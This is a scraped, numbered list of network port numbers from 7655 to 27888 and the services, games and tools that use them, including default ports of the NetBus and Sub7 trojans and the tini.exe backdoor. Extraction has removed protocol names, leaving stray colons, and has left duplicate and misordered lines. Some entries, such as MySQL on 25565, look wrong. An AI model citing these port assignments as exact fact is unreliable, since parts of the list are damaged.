989 | 7655 : I2P SAM Bridge Socket API Unofficial
990 | 7656 : I2P anonymizing overlay network Unofficial
991 | 7670 : BrettspielWelt BSW Boardgame Portal Unofficial
992 | 7676 : Aqumin AlphaVision Remote Command Interface[citation needed] Unofficial
993 | 7700 : P2P DC (RedHub)[citation needed] Unofficial
994 | 7707 : Killing Floor Unofficial
995 | 7708 : Killing Floor Unofficial
996 | 7717 : Killing Floor Unofficial
997 | 7777 : iChat server file transfer proxy Unofficial
998 | 7777 : Oracle Cluster File System 2[citation needed] Unofficial
999 | 7777 : Windows backdoor program tini.exe default[citation needed] Unofficial
1000 | 7777 : Just Cause 2: Multiplayer Mod Server[citation needed] Unofficial
1001 | 7777 : Xivio default Chat Server[citation needed] Unofficial
1002 | 7777 : Terraria default server Unofficial
1003 | 7777 : San Andreas Multiplayer (SA-MP) default port server Unofficial
1004 | 7778 : Bad Trip MUD[citation needed] Unofficial
1005 | 7777 : Unreal Tournament series default server[citation needed] Unofficial
1006 | 7777 : Unreal Tournament series default server[citation needed] Unofficial
1007 | 7787 : GFI EventsManager 7 & 8[citation needed] Official
1008 | 7831 : Default used by Smartlaunch Internet Cafe Administration[114] software Unofficial
1009 | 7880 : PowerSchool Gradebook Server[citation needed] Unofficial
1010 | 7890 : Default that will be used by the iControl Internet Cafe Suite Administration software Unofficial
1011 | 7915 : Default for YSFlight server[115] Unofficial
1012 | 7935 : Fixed port used for Adobe Flash Debug Player to communicate with a debugger (Flash IDE, Flex Builder or fdb).[116] Unofficial
1013 | 7937 : EMC2 (Legato) Networker or Sun Solstice Backup Official
1014 | 8000 : iRDMI (Intel Remote Desktop Management Interface)[117]—sometimes erroneously used instead of port 8080 Official
1015 | 8000 : iRDMI (Intel Remote Desktop Management Interface)[117]—sometimes erroneously used instead of port 8080 Official
1016 | 8000 : Commonly used for internet radio streams such as those using SHOUTcast Unofficial
1017 | 8000 : Splunk web-interface Unofficial
1018 | 8000 : FreemakeVideoCapture service a part of Freemake Video Downloader[118] Unofficial
1019 | 8000 : Nortel Contivity Router Firewall User Authentication (FWUA) default port number Unofficial
1020 | 8001 : Commonly used for internet radio streams such as those using SHOUTcast Unofficial
1021 | 8002 : Cisco Systems Unified Call Manager Intercluster[citation needed] Unofficial
1022 | 8005 : Apache Tomcat's Shutdown port Unofficial
1023 | 8006 : Dell AppAssure 5 API and Replication[119] Official
1024 | 8007 : Dell AppAssure 5 Engine[119] Official
1025 | 8008 : HTTP Alternate Official
1026 | 8008 : IBM HTTP Server administration default Unofficial
1027 | 8009 : ajp13—Apache JServ Protocol AJP Connector Unofficial
1028 | 8010 : XMPP File transfers Unofficial
1029 | 8011 : HTTP/ : Symon Communications Event and Query Engine[citation needed] Unofficial
1030 | 8014 : HTTP/ : Symon Communications Event and Query Engine[citation needed] Unofficial
1031 | 8014 : Perseus SDR Receiver default remote connection port[citation needed] Unofficial
1032 | 8020 : 360Works SuperContainer[120] Unofficial
1033 | 8042 : Orthanc—Default HTTP Port for GUI Unofficial
1034 | 8069 : OpenERP Default HTTP port (web interface and xmlrpc calls) Unofficial
1035 | 8070 : OpenERP Legacy netrpc protocol Unofficial
1036 | 8074 : Gadu-Gadu Unofficial
1037 | 8075 : Killing Floor Unofficial
1038 | 8078 : Default port for most Endless Online-based servers[citation needed] Unofficial
1039 | 8080 : HTTP alternate (http_alt)—commonly used for Web proxy and caching server, or for running a Web server as a non-root user Official
1040 | 8080 : Apache Tomcat Unofficial
1041 | 8080 : M2MLogger WebFRONT Cloud connector Unofficial
1042 | 8080 : Syncthing web GUI Unofficial
1043 | 8080 : FilePhile Master/Relay Unofficial
1044 | 8080 : Vermont Systems / RecTrac Vermont Systems RecTrac (WebTrac) network installer Unofficial
1045 | 8081 : HTTP alternate, VibeStreamer, e.g. McAfee ePolicy Orchestrator (ePO) Unofficial
1046 | 8083 : Transporter Connected Data, Inc. Unofficial
1047 | 8085 : / : Wiki Service uses : (Mac OS X Server v10.5 and later) / inSpeak Communicator uses both : / : . Unofficial
1048 | 8086 : HELM Web Host Automation Windows Control Panel Unofficial
1049 | 8086 : Kaspersky AV Control Center Unofficial
1050 | 8087 : Hosting Accelerator Control Panel Unofficial
1051 | 8087 : Parallels Plesk Control Panel Unofficial
1052 | 8087 : Kaspersky AV Control Center Unofficial
1053 | 8088 : Asterisk (PBX) Web Configuration utility (GUI Addon) Unofficial
1054 | 8089 : Splunk REST API endpoint. This port is NOT used for any forwarding or indexing. It is used only for command and control functions. Unofficial
1055 | 8089 : AVM Fritzbox for automatic tr069 configuration. Unofficial
1056 | 8090 : Atlassian Confluence (default port) [121]
1057 | 8090 : Coral Content Distribution Network (deprecated; 80 and 8080 now supported)[122] Unofficial
1058 | 8091 : CouchBase Web Administration Unofficial
1059 | 8092 : CouchBase API Unofficial
1060 | 8100 : Console Gateway License Verification Unofficial
1061 | 8111 : JOSM Remote Control Unofficial
1062 | 8112 : PAC Pacifica Coin Unofficial
1063 | 8116 : Check Point Cluster Control Protocol Unofficial
1064 | 8118 : Privoxy—advertisement-filtering Web proxy Official
1065 | 8123 : Polipo Web proxy Official
1066 | 8123 : Bukkit DynMap Default Webserver Bind Address Unofficial
1067 | 8139 : Puppet (software) Client agent Unofficial
1068 | 8140 : Puppet (software) Master server Unofficial
1069 | 8172 : Microsoft Remote Administration for IIS Manager[123] Unofficial
1070 | 8176 : Perceptive Automation[dead link] Indigo[dead link] Home automation server—control access Unofficial
1071 | 8184 : NCSA Brown Dog Data Access Proxy Unofficial
1072 | 8192 : Sophos Remote Management System Unofficial
1073 | 8193 : Sophos Remote Management System Unofficial
1074 | 8194 : Sophos Remote Management System Unofficial
1075 | 8194 : Bloomberg Application[1] Official
1076 | 8195 : Bloomberg Application[citation needed] Unofficial
1077 | 8200 : GoToMyPC Unofficial
1078 | 8222 : VMware Server Management User Interface[124] (insecure Web interface).[125] See also port 8333 Unofficial
1079 | 8243 : HTTPS listener for Apache Synapse[126] Official
1080 | 8280 : HTTP listener for Apache Synapse[126] Official
1081 | 8281 : HTTP Listener for Gatecraft Plugin Unofficial
1082 | 8291 : Winbox—Default on a MikroTik RouterOS for a Windows application used to administer MikroTik RouterOS[127] Unofficial
1083 | 8303 : Teeworlds Server Unofficial
1084 | 8330 : MultiBit HD, [1] Unofficial
1085 | 8331 : MultiBit, [2] Unofficial
1086 | 8332 : Bitcoin JSON-RPC server[128] Unofficial
1087 | 8333 : Bitcoin[129] Unofficial
1088 | 8333 : VMware Server Management User Interface[124] (secure Web interface).[125] See also port 8222 Unofficial
1089 | 8337 : VisualSVN Distributed File System Service (VDFS)[130] Unofficial
1090 | 8400 : cvp, CommVault Unified Data Management Official
1091 | 8442 : CyBro A-bus, Cybrotech Ltd. Official
1092 | 8443 : SW Soft Plesk Control Panel, Apache Tomcat SSL, Promise WebPAM SSL, McAfee ePolicy Orchestrator (ePO) Unofficial
1093 | 8444 : Bitmessage Unofficial
1094 | 8484 : MapleStory Login Server Unofficial
1095 | 8500 : ColdFusion Macromedia/Adobe ColdFusion default and Duke Nukem 3D—default Unofficial
1096 | 8501 : [3] DukesterX —default[citation needed] Unofficial
1097 | 8530 : Windows Server Update Services Official
1098 | 8531 : Windows Server Update Services over TLS/SSL (HTTPS) Official
1099 | 8580 : Freegate Unofficial
1100 | 8585 : MapleStory Game Server Unofficial
1101 | 8586 : MapleStory Game Server Unofficial
1102 | 8587 : MapleStory Game Server Unofficial
1103 | 8588 : MapleStory Game Server Unofficial
1104 | 8589 : MapleStory Game Server Unofficial
1105 | 8601 : Wavestore CCTV protocol[131] Unofficial
1106 | 8602 : Wavestore Notification protocol[131] Unofficial
1107 | 8629 : Tibero Server Unofficial
1108 | 8642 : Lotus Traveller[citation needed] Unofficial
1109 | 8691 : Ultra Fractal default server port for distributing calculations over network computers Unofficial
1110 | 8701 : SoftPerfect Bandwidth Manager Unofficial
1111 | 8702 : SoftPerfect Bandwidth Manager Unofficial
1112 | 8742 : avast! WebShield Unofficial
1113 | 8767 : TeamSpeak—default Unofficial
1114 | 8768 : TeamSpeak—alternate Unofficial
1115 | 8778 : EPOS Speech Synthesis System Unofficial
1116 | 8787 : MapleStory CashShop Game Server Unofficial
1117 | 8788 : MapleStory CashShop Game Server Unofficial
1118 | 8834 : Nessus web Unofficial
1119 | 8835 : Passive Vulnerability Scanner web Unofficial
1120 | 8836 : Log Correlation Engine web Unofficial
1121 | 8840 : Opera Unite server Unofficial
1122 | 8880 : cddbp-alt, CD DataBase (CDDB) protocol (CDDBP) alternate Official
1123 | 8880 : cddbp-alt, CD DataBase (CDDB) protocol (CDDBP) alternate Official
1124 | 8880 : WebSphere Application Server SOAP connector default Unofficial
1125 | 8880 : Win Media Streamer to Server SOAP connector default Unofficial
1126 | 8881 : Atlasz Informatics Research Ltd Secure Application Server[citation needed] Unofficial
1127 | 8881 : Netflexity Inc QFlex—IBM WebSphere MQ monitoring software. Unofficial
1128 | 8882 : Atlasz Informatics Research Ltd Secure Application Server[citation needed] Unofficial
1129 | 8883 : Secure MQ Telemetry Transport (MQTT over SSL) Official
1130 | 8886 : PPM3 (Padtec Management Protocol version 3) Unofficial
1131 | 8887 : HyperVM HTTP Official
1132 | 8888 : HyperVM HTTPS Official
1133 | 8888 : Freenet HTTP Unofficial
1134 | 8888 : NewsEDGE server Official
1135 | 8888 : Sun Answerbook dwhttpd server (deprecated by docs.sun.com[dead link]) Unofficial
1136 | 8888 : GNUmp3d HTTP music streaming and Web interface Unofficial
1137 | 8888 : LoLo Catcher HTTP Web interface (www.optiform.com) Unofficial
1138 | 8888 : D2GS Admin Console Telnet administration console for D2GS servers (Diablo 2) Unofficial
1139 | 8888 : Earthland Relams 2 Server (AU1_2)[citation needed] Unofficial
1140 | 8888 : MAMP Server Unofficial
1141 | 8889 : MAMP Server Unofficial
1142 | 8889 : Earthland Relams 2 Server (AU1_1)[citation needed] Unofficial
1143 | 8937 : Transaction Warehouse Data Service (TWDS) Official
1144 | 8983 : Default for Apache Solr[132] Unofficial
1145 | 8998 : I2P Monotone Repository Unofficial
1146 | 8989 : STEP Bible : Scripture Tools for Every Person Unofficial
1147 | 9000 : SonarQube Web Server[133] Unofficial
1148 | 9000 : Buffalo LinkSystem Web access[citation needed] Unofficial
1149 | 9000 : DBGp Unofficial
1150 | 9000 : SqueezeCenter web server & streaming Unofficial
1151 | 9000 : Cast Unofficial
1152 | 9000 : Play! Framework web server[134] Unofficial
1153 | 9000 : Hadoop NameNode default port Unofficial
1154 | 9000 : PHP-FPM default port Unofficial
1155 | 9001 : ETL Service Manager[135] Official
1156 | 9001 : Microsoft SharePoint authoring environment Unofficial
1157 | 9001 : cisco-xremote router configuration[citation needed] Unofficial
1158 | 9001 : Tor network default Unofficial
1159 | 9001 : DBGp Proxy Unofficial
1160 | 9001 : HSQLDB default port Unofficial
1161 | 9002 : Newforma Server comms Unofficial
1162 | 9009 : Pichat Server—Peer to peer chat software Official
1163 | 9010 : TISERVICEMANAGEMENT Numara Track-It! Unofficial
1164 | 9020 : WiT WiT Services Official
1165 | 9025 : WiT WiT Services Official
1166 | 9030 : Tor often used Unofficial
1167 | 9043 : WebSphere Application Server Administration Console secure Unofficial
1168 | 9050 : Tor Unofficial
1169 | 9051 : Tor Unofficial
1170 | 9060 : WebSphere Application Server Administration Console Unofficial
1171 | 9080 : glrpc, Groove Collaboration software GLRPC Official
1172 | 9080 : glrpc, Groove Collaboration software GLRPC Official
1173 | 9080 : WebSphere Application Server HTTP Transport (port 1) default Unofficial
1174 | 9080 : Remote Potato by FatAttitude, Windows Media Center addon Unofficial
1175 | 9080 : ServerWMC, Windows Media Center addon Unofficial
1176 | 9090 : WebSM Unofficial
1177 | 9090 : Webwasher, Secure Web, McAfee Web Gateway—Default Proxy Port[citation needed] Unofficial
1178 | 9090 : Openfire Administration Console Unofficial
1179 | 9090 : SqueezeCenter control (CLI) Unofficial
1180 | 9090 : Cherokee Admin Panel Unofficial
1181 | 9091 : Openfire Administration Console (SSL Secured) Unofficial
1182 | 9091 : Transmission (BitTorrent client) Web Interface Unofficial
1183 | 9092 : H2 (DBMS) Database Server Unofficial
1184 | 9100 : PDL Data Stream Official
1185 | 9100 : LPR - RAW Printing Official
1186 | 9101 : Bacula Director Official
1187 | 9102 : Bacula File Daemon Official
1188 | 9103 : Bacula Storage Daemon Official
1189 | 9105 : Xadmin Control Daemon Official
1190 | 9106 : Astergate Control Daemon Official
1191 | 9107 : Astergate-FAX Control Daemon Official
1192 | 9110 : SSMP Message protocol Unofficial
1193 | 9119 : MXit Instant Messenger Official
1194 | 9150 : Tor Unofficial
1195 | 9191 : Catamount Software—PocketMoney Sync[citation needed] Unofficial
1196 | 9191 : Sierra Wireless Airlink Unofficial
1197 | 9199 : Avtex LLC—qStats Unofficial
1198 | 9200 : Elasticsearch[136]—default Elasticsearch port Unofficial
1199 | 9217 : iPass Platform Service Unofficial
1200 | 9293 : Sony PlayStation RemotePlay[137] Unofficial
1201 | 9300 : IBM Cognos 8 SOAP Business Intelligence and Performance Management Unofficial
1202 | 9303 : D-Link Shareport Share storage and MFP printers Unofficial
1203 | 9306 : Sphinx Native API Official
1204 | 9309 : Sony PlayStation Vita Host Collaboration WiFi Data Transfer[138] Unofficial
1205 | 9312 : Sphinx SphinxQL Official
1206 | 9332 : Litecoin JSON-RPC server Unofficial
1207 | 9333 : Litecoin Unofficial
1208 | 9339 : Clash of Clans, a mobile freemium strategy video game Unofficial
1209 | 9389 : adws, Microsoft AD DS Web Services, Powershell uses this port Official
1210 | 9418 : git, Git pack transfer service Official
1211 | 9420 : MooseFS distributed file system—master server to chunk servers Unofficial
1212 | 9421 : MooseFS distributed file system—master server to clients Unofficial
1213 | 9422 : MooseFS distributed file system—chunk servers to clients Unofficial
1214 | 9443 : VMware Websense Triton console (HTTPS port used for accessing and administrating a vCenter Server via the Web Management Interface) Unofficial
1215 | 9443 : NCSA Brown Dog Data Tilling Service Unofficial
1216 | 9535 : mngsuite, LANDesk Management Suite Remote Control Official
1217 | 9536 : laes-bf, IP Fabrics Surveillance buffering function Official
1218 | 9600 : Omron FINS, OMRON FINS PLC communication Official
1219 | 9675 : Spiceworks Desktop, IT Helpdesk Software Unofficial
1220 | 9676 : Spiceworks Desktop, IT Helpdesk Software Unofficial
1221 | 9695 : CCNx Official
1222 | 9800 : WebDAV Source Official
1223 | 9800 : WebCT e-learning portal Unofficial
1224 | 9875 : Club Penguin Disney online game for kids Unofficial
1225 | 9898 : MonkeyCom[citation needed] Official
1226 | 9898 : MonkeyCom[citation needed] Official
1227 | 9898 : Tripwire—File Integrity Monitoring Software[139] Unofficial
1228 | 9899 : SCTP tunneling (port number used in SCTP packets encapsulated in : , RFC6951) Official
1229 | 9987 : TeamSpeak 3 server default (voice) port (for the conflicting service see the IANA list) Unofficial
1230 | 9996 : AdRem Software, Inc.'s NetCrunch NetFlow collector port. This port can be changed [140] Unofficial
1231 | 9997 : Splunk port for communication between the forwarders and indexers Unofficial
1232 | 9999 : Hydranode—edonkey2000 TELNET control Unofficial
1233 | 9999 : Lantronix UDS-10/UDS100[141] RS-485 to Ethernet Converter TELNET control Unofficial
1234 | 9999 : Urchin Web Analytics[citation needed] Unofficial
1235 | 10000 : Webmin—Web-based administration tool for Unix-like systems Unofficial
1236 | 10000 : BackupExec Unofficial
1237 | 10000 : Ericsson Account Manager (avim)[citation needed] Unofficial
1238 | 10001 : Lantronix UDS-10/UDS100[142] RS-485 to Ethernet Converter default Unofficial
1239 | 10003 : ForeScout SecureConnector[citation needed] Unofficial
1240 | 10008 : Octopus Multiplexer, primary port for the CROMP protocol[dead link], which provides a platform-independent means for communication of objects across a network Official
1241 | 10009 : Cross Fire, a multiplayer online First Person Shooter[citation needed] Unofficial
1242 | 10010 : Open Object Rexx (ooRexx) rxapi daemon Official
1243 | 10017 : AIX,NeXT, HPUX—rexd daemon control[citation needed] Unofficial
1244 | 10024 : Zimbra smtp [mta]—to amavis from postfix[citation needed] Unofficial
1245 | 10025 : Zimbra smtp [mta]—back to postfix from amavis[citation needed] Unofficial
1246 | 10042 : Mathoid server[citation needed] Unofficial
1247 | 10050 : Zabbix-Agent Official
1248 | 10051 : Zabbix-Trapper Official
1249 | 10110 : NMEA 0183 Navigational Data. Transport of NMEA 0183 sentences over : or : Official
1250 | 10113 : NetIQ Endpoint Official
1251 | 10114 : NetIQ Qcheck Official
1252 | 10115 : NetIQ Endpoint Official
1253 | 10116 : NetIQ VoIP Assessor Official
1254 | 10172 : Intuit Quickbooks client Unofficial
1255 | 10200 : FRISK Software International's fpscand virus scanning daemon for Unix platforms[143] Unofficial
1256 | 10200 : FRISK Software International's f-protd virus scanning daemon for Unix platforms[144] Unofficial
1257 | 10201 : FRISK Software International's f-protd virus scanning daemon for Unix platforms[144] Unofficial
1258 | 10212 : GE Intelligent Platforms Proficy HMI/SCADA – CIMPLICITY WebView[145] Official
1259 | 10301 : VoiceIP-ACS UMP default device provisioning endpoint[citation needed] Unofficial
1260 | 10302 : VoiceIP-ACS UMP default device provisioning endpoint (SSL)[citation needed] Unofficial
1261 | 10308 : Lock-on: Modern Air Combat[citation needed] Unofficial
1262 | 10480 : SWAT 4 Dedicated Server[citation needed] Unofficial
1263 | 10505 : BlueStacks (android simulator) broadcast[146] Unofficial
1264 | 10514 : TLS-enabled Rsyslog (default by convention) Unofficial
1265 | 10823 : Farming Simulator 2011 Default Server[citation needed] Unofficial
1266 | 10891 : Jungle Disk (this port is opened by the Jungle Disk Monitor service on the localhost)[citation needed] Unofficial
1267 | 11001 : metasys ( Johnson Controls Metasys java AC control environment )[citation needed] Unofficial
1268 | 11111 : RiCcI - Remote Configuration Interface (Redhat Linux) Unofficial
1269 | 11112 : ACR/NEMA Digital Imaging and Communications in Medicine (DICOM) Official
1270 | 11155 : Tunngle Unofficial
1271 | 11211 : memcached Unofficial
1272 | 11214 : memcached Incoming SSL Proxy Unofficial
1273 | 11215 : memcached Internal Outgoing SSL Proxy Unofficial
1274 | 11235 : Savage:Battle for Newerth Server Hosting[citation needed] Unofficial
1275 | 11294 : Blood Quest Online Server[citation needed] Unofficial
1276 | 11371 : OpenPGP HTTP key server Official
1277 | 11576 : IPStor Server management communication Unofficial
1278 | 11950 : Murraycoin JSON-RPC server[147] Unofficial
1279 | 11951 : Murraycoin[147] Unofficial
1280 | 12007 : NetCrunch 7 port for connection between NetCrunch 7 Server and Administration Console. This port can be changed [140] Unofficial
1281 | 12008 : NetCrunch default connection broker port [140] Unofficial
1282 | 12009 : NetCrunch 8 port for connection between NetCrunch 8 Server and Administration Console. This port can be changed [140] Unofficial
1283 | 12010 : ElevateDB default database port[148] Unofficial
1284 | 12011 : Axence nVision[149] Unofficial
1285 | 12012 : Axence nVision[149] Unofficial
1286 | 12012 : Audition Online Dance Battle, Korea Server—Status/Version Check Unofficial
1287 | 12012 : Audition Online Dance Battle, Korea Server—Status/Version Check Unofficial
1288 | 12013 : Audition Online Dance Battle, Korea Server Unofficial
1289 | 12030 : NetCrunch - port for connection between NetCrunch Server and NetCrunch Guard [140] Unofficial
1290 | 12031 : Axence nVision[149] Unofficial
1291 | 12032 : Axence nVision[149] Unofficial
1292 | 12035 : Linden Lab viewer to sim on SecondLife[citation needed] Unofficial
1293 | 12201 : GELF Protocol Unofficial
1294 | 12222 : Light Weight Access Point Protocol (LWAPP) LWAPP data (RFC 5412) Official
1295 | 12223 : Light Weight Access Point Protocol (LWAPP) LWAPP control (RFC 5412) Official
1296 | 12345 : NetBus—remote administration tool (often Trojan horse). Also used by NetBuster. Little Fighter 2 ( : ), Cubeworld[150] ( : and : ), and ( : ) GVG (Grass Valley Group) SMS7000 and RCL video router control Unofficial
1297 | 12443 : IBM HMC web browser management access over HTTPS instead of default port 443[151] Unofficial
1298 | 12489 : NSClient/NSClient++/NC_Net (Nagios) Unofficial
1299 | 12975 : LogMeIn Hamachi (VPN tunnel software; also port 32976)—used to connect to Mediation Server (bibi.hamachi.cc); will attempt to use SSL ( : port 443) if both 12975 & 32976 fail to connect Unofficial
1300 | 12998 : Takenaka RDI Mirror World on SecondLife[citation needed] Unofficial
1301 | 13001 : ForeScout CounterACT[citation needed] Unofficial
1302 | 13000 : Linden Lab viewer to sim on SecondLife[citation needed] Unofficial
1303 | 13008 : Cross Fire, a multiplayer online First Person Shooter[citation needed] Unofficial
1304 | 13075 : Default[152] for BMC Software Control-M/Enterprise Manager Corba communication, though often changed during installation Official
1305 | 13195 : Ontolux Ontolux 2D Unofficial
1306 | 13337 : ÆtherNet peer-to-peer networking[citation needed] Unofficial
1307 | 13720 : Symantec NetBackup—bprd (formerly VERITAS) Official
1308 | 13721 : Symantec NetBackup—bpdbm (formerly VERITAS) Official
1309 | 13724 : Symantec Network Utility—vnetd (formerly VERITAS) Official
1310 | 13782 : Symantec NetBackup—bpcd (formerly VERITAS) Official
1311 | 13783 : Symantec VOPIED protocol (formerly VERITAS) Official
1312 | 13785 : Symantec NetBackup Database—nbdb (formerly VERITAS) Official
1313 | 13786 : Symantec nomdb (formerly VERITAS) Official
1314 | 14439 : APRS UI-View Amateur Radio[153] UI-WebServer Unofficial
1315 | 14567 : Battlefield 1942 and mods Unofficial
1316 | 14900 : K3 SYSPRO K3 Framework WCF Backbone[citation needed] Unofficial
1317 | 15000 : psyBNC Unofficial
1318 | 15000 : Wesnoth Unofficial
1319 | 15000 : Kaspersky Network Agent[citation needed] Unofficial
1320 | 15000 : hydap, Hypack Hydrographic Software Packages Data Acquisition Official
1321 | 15000 : hydap, Hypack Hydrographic Software Packages Data Acquisition Official
1322 | 15556 : Jeex.EU Artesia (direct client-to-db.service) Official
1323 | 15567 : Battlefield Vietnam and mods Unofficial
1324 | 15345 : XPilot Contact Official
1325 | 16000 : Oracle WebCenter Content: Imaging (formerly known as Oracle Universal Content Management). Port though often changed during installation Unofficial
1326 | 16000 : shroudBNC Unofficial
1327 | 16080 : Mac OS X Server Web (HTTP) service with performance cache[154] Unofficial
1328 | 16200 : Oracle WebCenter Content: Content Server (formerly known as Oracle Universal Content Management). Port though often changed during installation Unofficial
1329 | 16225 : Oracle WebCenter Content: Content Server Web UI. Port though often changed during installation Unofficial
1330 | 16250 : Oracle WebCenter Content: Inbound Refinery (formerly known as Oracle Universal Content Management). Port though often changed during installation Unofficial
1331 | 16261 : Project Zomboid Multiplayer Server: Additional sequential ports used for each player connecting to server Unofficial
1332 | 16300 : Oracle WebCenter Content: Records Management (formerly known as Oracle Universal Records Management). Port though often changed during installation Unofficial
1333 | 16384 : Hewlett Packard Connected Backup[155] Official
1334 | 16384 : CISCO Default RTP MIN Unofficial
1335 | 16400 : Oracle WebCenter Content: Capture (formerly known as Oracle Document Capture). Port though often changed during installation Unofficial
1336 | 16482 : CISCO Default RTP MAX official
1337 | 16567 : Battlefield 2 and mods Unofficial
1338 | 17011 : Worms multiplayer Unofficial
1339 | 17500 : Dropbox LanSync Protocol (db-lsp); used to synchronize file catalogs between Dropbox clients on a local network. Official
1340 | 18010 : Super Dancer Online Extreme(SDO-X)—CiB Net Station Malaysia Server[citation needed] Unofficial
1341 | 18091 : memcached Internal REST HTTPS for SSL Unofficial
1342 | 18092 : memcached Internal CAPI HTTPS for SSL Unofficial
1343 | 18104 : RAD PDF Service Official
1344 | 18180 : DART Reporting server[citation needed] Unofficial
1345 | 18200 : Audition Online Dance Battle, AsiaSoft Thailand Server—Status/Version Check Unofficial
1346 | 18201 : Audition Online Dance Battle, AsiaSoft Thailand Server Unofficial
1347 | 18206 : Audition Online Dance Battle, AsiaSoft Thailand Server—FAM Database Unofficial
1348 | 18300 : Audition Online Dance Battle, AsiaSoft SEA Server—Status/Version Check Unofficial
1349 | 18301 : Audition Online Dance Battle, AsiaSoft SEA Server Unofficial
1350 | 18306 : Audition Online Dance Battle, AsiaSoft SEA Server—FAM Database Unofficial
1351 | 18333 : Bitcoin testnet[129] Unofficial
1352 | 18400 : Audition Online Dance Battle, KAIZEN Brazil Server—Status/Version Check Unofficial
1353 | 18401 : Audition Online Dance Battle, KAIZEN Brazil Server Unofficial
1354 | 18505 : Audition Online Dance Battle R4p3 Server, Nexon Server—Status/Version Check Unofficial R4p3 Server
1355 | 18506 : Audition Online Dance Battle, Nexon Server Unofficial
1356 | 18605 : X-BEAT—Status/Version Check Unofficial
1357 | 18606 : X-BEAT Unofficial
1358 | 19000 : Audition Online Dance Battle, G10/alaplaya Server—Status/Version Check Unofficial
1359 | 19000 : JACK sound server Unofficial
1360 | 19001 : Audition Online Dance Battle, G10/alaplaya Server Unofficial
1361 | 19007 : Veejansh Inc. Scintilla Device Service Official
1362 | 19132 : Standard Minecraft Pocket Edition Multiplayer Server Port Unofficial
1363 | 19150 : Gkrellm Server Unofficial
1364 | 19226 : Panda Software AdminSecure Communication Agent Unofficial
1365 | 19283 : K2—KeyAuditor & KeyServer, Sassafras Software Inc.[156] Software Asset Management tools Official
1366 | 19294 : Google Talk Voice and Video connections[157] Unofficial
1367 | 19295 : Google Talk Voice and Video connections[157] Unofficial
1368 | 19302 : Google Talk Voice and Video connections[157] Unofficial
1369 | 19315 : KeyShadow for K2—KeyAuditor & KeyServer, Sassafras Software Inc.[156] Software Asset Management tools Official
1370 | 19540 : Gamecoin RCP[citation needed] Unofficial
1371 | 19540 : Gamecoin Testnet[citation needed] Unofficial
1372 | 19540 : Gamecoin P2P[citation needed] Unofficial
1373 | 19540 : Belkin Network USB Hub[citation needed] Unofficial
1374 | 19638 : Ensim Control Panel[citation needed] Unofficial
1375 | 19812 : 4D database SQL Communication[158] Official
1376 | 19813 : 4D database Client Server Communication[158] Official
1377 | 19814 : 4D database DB4D Communication[158] Official
1378 | 19999 : DNP—Secure (Distributed Network Protocol—Secure), a secure version of the protocol used in SCADA systems between communicating RTU's and IED's Official
1379 | 20000 : DNP (Distributed Network Protocol), a protocol used in SCADA systems between communicating RTU's and IED's Official
1380 | 20000 : Usermin, Web-based user tool Unofficial
1381 | 20202 : OnNet (Net2E) Unofficial
1382 | 20014 : DART Reporting server[citation needed] Unofficial
1383 | 20560 : Killing Floor Unofficial
1384 | 20595 : 0 A.D. Empires Ascendant Unofficial
1385 | 20702 : Precise TPM Listener Agent Unofficial
1386 | 20720 : Symantec i3 Web GUI server Unofficial
1387 | 20790 : Precise TPM Web GUI server Unofficial
1388 | 21001 : AMLFilter, AMLFilter Inc. amlf-admin default port Unofficial
1389 | 21011 : AMLFilter, AMLFilter Inc. amlf-engine-01 default http port Unofficial
1390 | 21012 : AMLFilter, AMLFilter Inc. amlf-engine-01 default https port Unofficial
1391 | 21021 : AMLFilter, AMLFilter Inc. amlf-engine-02 default http port Unofficial
1392 | 21022 : AMLFilter, AMLFilter Inc. amlf-engine-02 default https port Unofficial
1393 | 21025 : Starbound Server (default), Starbound Unofficial
1394 | 22136 : FLIR Systems Camera Resource Protocol Unofficial
1395 | 22222 : Davis Instruments, WeatherLink IP Unofficial
1396 | 22347 : WibuKey, WIBU-SYSTEMS AG Software protection system Official
1397 | 22349 : Wolfson Microelectronics WISCEBridge Debug Protocol[159] Unofficial
1398 | 22350 : CodeMeter, WIBU-SYSTEMS AG Software protection system Official
1399 | 23073 : Soldat Dedicated Server Unofficial
1400 | 23399 : Skype Default Protocol Unofficial
1401 | 23513 : Duke Nukem 3D#Source code Duke Nukem Ports Unofficial
1402 | 24441 : Pyzor spam detection network Unofficial
1403 | 24444 : NetBeans integrated development environment Unofficial
1404 | 24465 : Tonido Directory Server for Tonido which is a Personal Web App and P2P platform Official
1405 | 24554 : BINKP, Fidonet mail transfers over : /IP Official
1406 | 24800 : Synergy: keyboard/mouse sharing software Unofficial
1407 | 24842 : StepMania: Online: Dance Dance Revolution Simulator Unofficial
1408 | 25000 : Teamware Office standard client connection Official
1409 | 25001 : Default port for Unity3D networking Official
1410 | 25003 : Teamware Office client notifier Official
1411 | 25005 : Teamware Office message transfer Official
1412 | 25007 : Teamware Office MIME Connector Official
1413 | 25008 : Jayson's Water Fun Connector Unofficial
1414 | 25010 : Teamware Office Agent server Official
1415 | 25560 : codeheart.js Relay Server Unofficial
1416 | 25565 : Standard Minecraft (Dedicated) Server Unofficial
1417 | 25565 : MySQL Standard MySQL port Unofficial
1418 | 25570 : Manic Digger default single player port Unofficial
1419 | 25826 : collectd default port[160] Unofficial
1420 | 25828 : DarknessBlade Network. Unofficial
1421 | 25888 : Xfire (Firewall Report, : _IN) IP Address (206.220.40.146) resolves to gameservertracking.xfire.com. Use unknown. Unofficial
1422 | 25999 : Xfire Unofficial
1423 | 26000 : id Software's Quake server Official
1424 | 26000 : id Software's Quake server Official
1425 | 26000 : CCP's EVE Online Online gaming MMORPG Unofficial
1426 | 26000 : Xonotic, an open source arena shooter Official
1427 | 26850 : War of No Return Server Port[citation needed] Unofficial
1428 | 26900 : CCP's EVE Online Online gaming MMORPG Unofficial
1429 | 26901 : CCP's EVE Online Online gaming MMORPG Unofficial
1430 | 26950 : GIMA Productions Unofficial
1431 | 27000 : Steam Client Unofficial
1432 | 27000 : (through 27006) id Software's QuakeWorld master server Unofficial
1433 | 27000 : PowerBuilder SySAM license server Unofficial
1434 | 27000 : FlexNet Publisher's License server (from the range of default ports) Unofficial
1435 | 27010 : Source engine dedicated server port Unofficial
1436 | 27014 : Steam Downloads Unofficial
1437 | 27014 : Source engine dedicated server port (rare) Unofficial
1438 | 27015 : GoldSrc and Source engine dedicated server port, AppleMobileDeviceService[161] Unofficial
1439 | 27016 : Magicka server port Unofficial
1440 | 27017 : mongoDB server port Unofficial
1441 | 27036 : Steam In-Home Streaming (Only LAN) Unofficial
1442 | 27374 : Sub7 default. Unofficial
1443 | 27500 : id Software's QuakeWorld Unofficial
1444 | 27888 : Kaillera server Unofficial
